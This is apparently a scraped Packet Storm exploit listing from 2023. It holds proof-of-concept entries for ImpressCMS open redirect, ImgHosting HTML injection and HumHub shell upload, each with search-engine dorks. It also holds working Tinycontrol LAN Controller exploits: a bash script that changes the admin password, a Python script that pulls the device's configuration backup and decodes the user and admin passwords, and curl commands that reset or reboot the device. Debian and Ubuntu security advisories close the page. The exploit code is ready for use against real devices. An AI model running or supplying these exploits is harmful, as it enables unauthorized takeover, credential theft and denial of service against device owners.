Impress CMS version 1.3.9 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : impress CMS v1.3.9 Open Redirect vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.impresscms.org/                                                                                         || # Dork      : "Powered by ImpressCMS"                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :http://localhost/user.php?xoops_redirect="maliciouslink"[+] http://localhost/user.php?xoops_redirect=https://packetstormsecurity.com/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Impress CMS 1.3.9 Open Redirection

ImgHosting version 1.3 suffers from a html injection vulnerability.

    ====================================================================================================================================| # Title     : ImgHosting v1.3 html injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new user http://www.127.0.0.1/sowrkom/?register[+] Login and upload image file go to yours file http://127.0.0.1/ikhostingcom/?files[+] and edit your image and add Description put this code Url redirect <META http-equiv="refresh" content="5;URL=https://cxsecurity.com/">[+] http://127.0.0.1/ikhostinom/DNSRBJhGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

ImgHosting 1.3 HTML Injection

Humhub version 1.3.13 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Unrestricted File Upload Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               || # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       || # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Unauthorized file upload Allows any Registered members to upload malicious files and run them.[+] Register new user .[+] go to your profile https://127.0.0.1/humhub.com/u/admin/user/profile/home Get started and post something bad.[+] /uploads/file/yours.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Humhub 1.3.13 Shell Upload

This archive contains all of the 305 exploits added to Packet Storm in August, 2023.

Packet Storm New Exploits For August, 2023

Tinycontrol LAN Controller version 3 suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.

    #!/bin/bash: "Tinycontrol LAN Controller v3 (LK3) Remote Admin Password ChangeVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The application suffers from an insecure accesscontrol allowing an unauthenticated attacker tochange accounts passwords and bypass authenticationgaining panel control access.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5787Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php18.08.2023"set -euo pipefailIFS=$'\n\t'if [ $# -ne 2 ]; then    echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'    exitfiIP=$1PW=$2EN=$(echo -n $PW | base64)curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/echo -ne '\nAdmin password changed to: '$PW

Tinycontrol LAN Controller 3 Remote Admin Password Change

Tinycontrol LAN Controller version 3 suffers from an issue where an unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

    #!/usr/bin/env python### Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC### Vendor: Tinycontrol# Product web page: https://www.tinycontrol.pl# Affected version: <=1.58a, HW 3.8## Summary: Lan Controller is a very universal# device that allows you to connect many different# sensors and remotely view their readings and# remotely control various types of outputs.# It is also possible to combine both functions# into an automatic if -> this with a calendar# when -> then. The device provides a user interface# in the form of a web page. The website presents# readings of various types of sensors: temperature,# humidity, pressure, voltage, current. It also# allows you to configure the device, incl. event# setting and controlling up to 10 outputs. Thanks# to the support of many protocols, it is possible# to operate from smartphones, collect and observ# the results on the server, as well as cooperation# with other I/O systems based on TCP/IP and Modbus.## Desc: An unauthenticated attacker can retrieve the# controller's configuration backup file and extract# sensitive information that can allow him/her/them# to bypass security controls and penetrate the system# in its entirety.## Tested on: lwIP### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5786# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php### 18.08.2023##import subprocessimport requestsimport base64import sysbinb = "lk3_settings.bin"outf = "lk3_settings.enc"bpatt = "0upassword"epatt = "pool.ntp.org"startf = Falseendf = Falseextral = []print("""    O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O    |                                          |    |     Tinycontrol LK3 1.58 Settings DL     |    |              ZSL-2023-5786               |    |         2023 (c) Zero Science Lab        |    |                                          |    |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|    |                                          |""")if len(sys.argv) != 2:    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))    exit(-0)else:    rhost=sys.argv[1]    if not "http" in rhost:        rhost="http://{}".format(rhost)try:    resp = requests.get(rhost + "/" + binb)    if resp.status_code == 200:        with open(outf, 'wb') as f:            f.write(resp.content)        print(f"[*] Got data as {outf}")    else:        print(f"[!] Backup failed. Status code: {resp.status_code}")except Exception as e:    print("[!] Error:", str(e))    exit(-1)binf = outfsout = subprocess.check_output(["strings", binf], universal_newlines = True)linea = sout.split("\n")for thricer in linea:    if bpatt in thricer:        startf = True    elif epatt in thricer:        endf = True    elif startf and not endf:        extral.append(thricer)if len(extral) >= 4:    userl = extral[1].strip()    adminl = extral[3].strip()    try:        decuser = base64.b64decode(userl).decode("utf-8")        decadmin = base64.b64decode(adminl).decode("utf-8")        print("[+] User password:", decuser)        print("[+] Admin password:", decadmin)    except Exception as e:        print("[!] Error decoding:", str(e))else:    print("[!] Regex failed.")    exit(-2)

Tinycontrol LAN Controller 3 Remote Credential Extraction

Tinycontrol LAN Controller version 3 suffers from an unauthenticated remote denial of service vulnerability. An attacker can issue direct requests to the stm.cgi page to reboot and also reset factory settings on the device.

    Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service ExploitVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The controller suffers from an unauthenticatedremote denial of service vulnerability. An attackercan issue direct requests to the stm.cgi page toreboot and also reset factory settings on the device.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5785Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php18.08.2023--$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1   # reboot controller

Tinycontrol LAN Controller 3 Denial Of Service

Debian Linux Security Advisory 5487-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5487-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 31, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4572Debian Bug     : 1024981A security issue was discovered in Chromium, which could result in theexecution of arbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 116.0.5845.140-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 116.0.5845.140-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTw5XQACgkQEMKTtsN8TjY4RQ//b6+fDtZKSmdGZi9IFFjHnEa3/qG2C6KcR13vwLJRysGoiFhu0B+58s2UU10Gdbo1/Qx6E5qwO0WaUHnlm2q56E8xt/MZ1C44lrI2/QByjnljX/BznbVu5IOmesgLz6Slf+L8goykVug6OW0cZpe5yiXL7Cg6qM9+K3e+7kIiif4DylYnOSHNZ4JprQE01W/6JziWeqcYEPpR4LoqhzRFQZQXRNdgKZWfy33dRmt+qWFE7eGpmLDltKcLe4A6iti3VxG5Ktn/fD84i41sjr4vM1PHrvuPwp1btLsgmbbZiElTBjpb6csAfOU/woGiwX7ak3iUW1l0sqoh2ksanmEZesvTpfBQ9BsfO8NrBmsJhmGNN+N8o5xroYFKhlt6+Xc9R7iRYBZxHQuohUjojKK0Nebh8QLL6oW+aMgxq4pVyDE3qwf7Rsd+V6Biq57Yq2MjLlzO7+y/VXs6fUyqjo/pKbgZADDXTYGzcq23eMJX15vvueeFLTR1ZasAwj9E2qgLl70+vecDLHpFXx2YBK2JYqUS1dZUHXQMr7PigOxFkF2U94bnhll/emcGgP7qpaPgC7KEjk8MPF+q3jLezSdzUdMLfUmUN9NR7a14euSr8blXSaZg30KPz6gVyvrUBpF6g1zJlDtcS2IYTkk2FtwzR2RpDgtFh5YZl/pnZ+VFrKE==LVjS-----END PGP SIGNATURE-----

Debian Security Advisory 5487-1

Ubuntu Security Notice 6332-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. William Zhao discovered that the Traffic Control subsystem in the Linux kernel did not properly handle network packet retransmission in certain situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6332-1  
August 31, 2023

linux-azure, linux-azure-5.15, linux-azure-fde vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems  
- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly check buffer indexes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2022-48502)

Seth Jenkins discovered that the Linux kernel did not properly perform  
address randomization for a per-cpu memory management structure. A local  
attacker could use this to expose sensitive information (kernel memory) or  
in conjunction with another kernel vulnerability. (CVE-2023-0597)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

Ruihan Li discovered that the bluetooth subsystem in the Linux kernel did  
not properly perform permissions checks when handling HCI sockets. A  
physically proximate attacker could use this to cause a denial of service  
(bluetooth communication). (CVE-2023-2002)

Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

It was discovered that the XFS file system implementation in the Linux  
kernel did not properly perform metadata validation when mounting certain  
images. An attacker could use this to specially craft a file system image  
that, when mounted, could cause a denial of service (system crash).  
(CVE-2023-2124)

Ye Zhang and Nicolas Wu discovered that the io_uring subsystem in the Linux  
kernel did not properly handle locking for rings with IOPOLL, leading to a  
double-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-21400)

Juan Jose Lopez Jaimez, Meador Inge, Simon Scannell, and Nenad Stojanovski  
discovered that the BPF verifier in the Linux kernel did not properly mark  
registers for precision tracking in certain situations, leading to an out-  
of-bounds access vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-2163)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that the perf subsystem in the Linux kernel contained a  
use-after-free vulnerability. A privileged local attacker could possibly  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-2235)

Zheng Zhang discovered that the device-mapper implementation in the Linux  
kernel did not properly handle locking during table_clear() operations. A  
local attacker could use this to cause a denial of service (kernel  
deadlock). (CVE-2023-2269)

It was discovered that the ARM Mali Display Processor driver implementation  
in the Linux kernel did not properly handle certain error conditions. A  
local attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2023-23004)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the Ricoh R5C592 MemoryStick card reader driver in  
the Linux kernel contained a race condition during module unload, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-3141)

Quentin Minster discovered that the KSMBD implementation in the Linux  
kernel did not properly validate pointers in some situations, leading to a  
null pointer dereference vulnerability. A remote attacker could use this to  
cause a denial of service (system crash). (CVE-2023-32248)

It was discovered that the kernel->user space relay implementation in the  
Linux kernel did not properly perform certain buffer calculations, leading  
to an out-of-bounds read vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or expose sensitive information  
(kernel memory). (CVE-2023-3268)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

It was discovered that the BQ24190 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33288)

It was discovered that the video4linux driver for Philips based TV cards in  
the Linux kernel contained a race condition during device removal, leading  
to a use-after-free vulnerability. A physically proximate attacker could  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-35823)

It was discovered that the SDMC DM1105 PCI device driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A physically proximate attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-35824)

It was discovered that the Renesas USB controller driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35828)

It was discovered that the Rockchip Video Decoder IP driver in the Linux  
kernel contained a race condition during device removal, leading to a use-  
after-free vulnerability. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-35829)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle certain error conditions, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3610)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle table rules flush in certain circumstances. A local  
attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-3777)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle rule additions to bound chains in certain  
circumstances. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-3995)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle PIPAPO element removal, leading to a use-after-free  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-4004)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle bound chain deactivation in certain circumstances. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-4015)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1045-azure   5.15.0-1045.52  
   linux-image-5.15.0-1045-azure-fde  5.15.0-1045.52.1  
   linux-image-azure-fde-lts-22.04  5.15.0.1045.52.23  
   linux-image-azure-lts-22.04     5.15.0.1045.41

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1045-azure   5.15.0-1045.52~20.04.1  
   linux-image-azure               5.15.0.1045.52~20.04.34  
   linux-image-azure-cvm           5.15.0.1045.52~20.04.34

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6332-1  
   CVE-2022-40982, CVE-2022-4269, CVE-2022-48502, CVE-2023-0597,  
   CVE-2023-1611, CVE-2023-1855, CVE-2023-1990, CVE-2023-2002,  
   CVE-2023-20593, CVE-2023-2124, CVE-2023-21400, CVE-2023-2163,  
   CVE-2023-2194, CVE-2023-2235, CVE-2023-2269, CVE-2023-23004,  
   CVE-2023-28466, CVE-2023-30772, CVE-2023-3141, CVE-2023-32248,  
   CVE-2023-3268, CVE-2023-33203, CVE-2023-33288, CVE-2023-35823,  
   CVE-2023-35824, CVE-2023-35828, CVE-2023-35829, CVE-2023-3609,  
   CVE-2023-3610, CVE-2023-3611, CVE-2023-3776, CVE-2023-3777,  
   CVE-2023-3995, CVE-2023-4004, CVE-2023-4015

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1045.52  
   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1045.52.1  
   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1045.52~20.04.1

Ubuntu Security Notice USN-6332-1

VMWare Aria Operations for Networks (vRealize Network Insight) static SSH key remote code execution proof of concept exploit.

Source

Packet Storm